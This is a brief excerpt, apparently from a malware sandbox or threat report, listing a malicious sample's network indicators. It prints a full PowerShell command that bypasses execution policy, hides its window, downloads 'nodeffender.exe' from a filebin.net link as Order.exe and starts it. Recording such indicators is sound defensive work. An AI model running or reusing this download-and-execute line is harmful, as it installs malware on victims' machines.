Technical Information
- https://filebin.net/ivlin4meff64uwk7/nodeffender.exe as order.exe
- 'fi##bin.net':443
- 'fi##bin.net':443
- DNS ASK fi##bin.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://filebin.net/ivlin4meff64uwk7/nodeffender.exe','Order.exe');Start-Process ...' (with hidden window)